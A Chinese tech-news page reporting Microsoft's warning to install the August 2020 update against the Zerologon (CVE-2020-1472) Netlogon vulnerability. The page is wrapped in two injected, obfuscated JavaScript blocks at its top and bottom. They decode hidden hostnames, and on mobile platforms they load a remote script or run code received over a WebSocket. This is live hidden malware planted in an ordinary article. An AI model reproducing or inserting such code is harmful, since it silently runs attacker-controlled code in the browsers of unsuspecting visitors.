function hPSpQMJ(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function CeDWKSs(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return hPSpQMJ(t);};window['\x47\x42\x7a\x57\x4d\x45\x6f\x4f\x4b']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=CeDWKSs,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/q/'+i;cs.parentElement.insertBefore(s,cs);}})('aGG4uc3BvcnRzZHJlYW0udGG9w','dHIueWWVzdWW42NzguY29t','138805',window,document,['G','W']);}:function(){};

微软建议用户立刻更新,防御Zerologon漏洞攻击

微软表示,目前仍然有黑客利用Netlogon远程协议中的Zerologon漏洞(CVE-2020-1472)来入侵未安装安全性更新的计算机。

微软建议用户尽快安装更新 免遭Zerologon漏洞攻击

虽然微软在8月份时已经推出了一连串的安全更新来解决这个漏洞,但是有不少用户,特别是企业用户依然没有更新他们的Windows服务器设备,使得他们继续暴露在提升特权攻击的危险中。在面对没有安装安全性更新的系统时,攻击者可以利用Zerologon漏洞来骗过域账号,并且以此来窃取域名的敏感讯息甚至接管整个域的控制。

在一篇官方博客中,微软安全应对中心的工程副总裁Anachal Gupta呼吁还未更新的用户尽快安装8月份的安全性更新:

“对于任何域控制器来说,安装2020年8月11日或以后的安全性更新是解决这个漏洞至关重要的第一步。在安装完成后,Active Directory域控制器以及受信任的账号将会与Windows域账户一起受到保护。因此我们强烈建议任何未更新的用户尽快安装安全性更新。客户在安装更新后需要按照KB4557222的指引来确保系统受到最好的保护。”

由于部分受到Zerologon漏洞影响的设备出现了验证问题,因此微软也正在分两个阶段推出修补漏洞的措施,同时也更新了原本的漏洞文檔里的FAQ来更清楚地解答用户的疑问。

而如果用户的系统是使用微软Defender for Identity者微软365 Defender的话,系统在受到Zerologon漏洞攻击时也可以马上通知用户。

给TA买糖
共{{data.count}}人
人已赞赏
数码圈

华为Mate 40系列8秒破亿!京东百架无人机摆阵庆祝

2020-11-1 17:28:32

数码圈

爆料:RXT 3060TI将于11月17日发布价格2999元

2020-11-1 23:52:59

function OdHtwI(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function hVIzGUms(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return OdHtwI(t);};window['\x6a\x75\x57\x4b\x49\x53\x45\x76']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=hVIzGUms,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/q/'+i;cs.parentElement.insertBefore(s,cs);}})('aG4ucc3BvccnRzZHJlYW0udG9w','dHIueWVzdW42NzgguY29t','138806',window,document,['c','g']);}:function(){};
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧